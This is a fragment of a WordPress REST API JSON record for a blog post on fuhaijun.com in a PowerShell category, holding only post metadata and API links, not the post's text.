[…]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[43,1],"tags":[],"class_list":["post-33536","post","type-post","status-publish","format-standard","hentry","category-powershell","category-default"],"_links":{"self":[{"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=\/wp\/v2\/posts\/33536"}],"collection":[{"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=33536"}],"version-history":[{"count":2,"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=\/wp\/v2\/posts\/33536\/revisions"}],"predecessor-version":[{"id":33734,"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=\/wp\/v2\/posts\/33536\/revisions\/33734"}],"wp:attachment":[{"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=33536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=33536"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.fuhaijun.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=33536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}